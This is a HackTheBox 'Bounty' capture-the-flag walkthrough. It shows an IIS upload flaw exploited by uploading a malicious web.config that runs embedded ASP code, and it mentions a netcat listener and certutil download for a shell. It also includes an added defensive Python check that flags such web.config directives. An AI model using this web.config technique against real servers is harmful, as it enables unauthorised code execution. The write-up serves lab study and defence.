HackTheBox_Bounty w/o Metasploit

HTB - Bounty

Enumeration

Nmap Scan

Homepage

Dirbusting Results

Transfer.aspx

Vulnerabilities

Transfer.aspx Directory

ASP code execution through an uploaded web.config: https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/

Exploitation

Upload Extensions

Let’s see which extensions we can upload to the server.

First, let’s send the upload request to Repeater.

Creating Payload

Now let’s create our payload

Let this be our extensions.txt file

We send the request to Intruder and then add our payload.

Defining Payload

Here we define the payload

OK, so with this we can tell that the server accepts uploads with these extensions

Using Config File

https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/

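This web.config registers asp.dll as the handler for *.config files and removes the request-filtering rules that would block them, so ASP code embedded in the file runs when the file is requested. That could give us a shell, so let’s use it.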

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

Uploading Shell

Now let’s upload this file on the server

It’s displaying 3, which means our web.config file is working properly
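
From the defender's side, the directives that make this web.config work are easy to look for. The following is an added example, not code from the original post: a Python check that flags those directives in a web.config found in an upload directory. The function name, the finding labels and both sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ASP_BLOCK = re.compile(r"<%.*?%>", re.S)  # ASP code anywhere, even inside an XML comment

def audit_web_config(text):
    """Return findings for a web.config found in an upload directory (empty list = none)."""
    findings = []
    if ASP_BLOCK.search(text):
        findings.append("asp-code-block")
    if "<!DOCTYPE" in text.upper():  # refuse DTDs instead of parsing entity definitions
        return findings + ["doctype-not-parsed"]
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError:
        return findings + ["malformed-xml"]
    for handlers in root.iter("handlers"):
        policy = {p.strip().lower() for p in handlers.get("accessPolicy", "").split(",")}
        if policy & {"write", "execute"}:  # heuristic: broader than a static site needs
            findings.append("handlers-accessPolicy-write-or-execute")
        for add in handlers.iter("add"):
            path, proc = add.get("path", ""), add.get("scriptProcessor", "")
            if proc or path.lower().endswith(".config"):
                findings.append("handler-mapping:%s->%s" % (path, proc))
    for rem in root.iter("remove"):
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append("requestFiltering-unblocks-.config")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("hiddenSegments-unhides-web.config")
    return findings

# Constructed sample: same directives as the file above, ASP body reduced to a harmless marker.
SUSPICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
 <handlers accessPolicy="Read, Script, Write">
  <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
       scriptProcessor="%windir%\system32\inetsrv\asp.dll" requireAccess="Write" />
 </handlers>
 <security><requestFiltering>
  <fileExtensions><remove fileExtension=".config" /></fileExtensions>
  <hiddenSegments><remove segment="web.config" /></hiddenSegments>
 </requestFiltering></security>
</system.webServer></configuration>
<!-- <% Response.write(1+2) %> -->"""
# Constructed sample: a config with no handler or request-filtering changes.
BENIGN = """<configuration><system.webServer>
 <defaultDocument enabled="true" /></system.webServer></configuration>"""

if __name__ == "__main__":
    print(audit_web_config(SUSPICIOUS), audit_web_config(BENIGN))
```

Any finding on a file inside an upload directory is a reason to quarantine it. The more robust control is to reject .config uploads outright and store uploaded files outside the web root, so IIS never processes them.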

Getting a Shell

Now we can go ahead and try getting a shell

Alright, we have made our payload, now time to get it running on the victim’s box

Setting Up

Setting up our Python server and netcat

Using Certutil

We will now use certutil to get the exe payload

Uploading and Refreshing

After uploading and then refreshing the uploadedfiles/webconfig dir, we have our shell.

Note: Shell kept bugging out, will update this in the future

This post is licensed under CC BY 4.0 by the author.
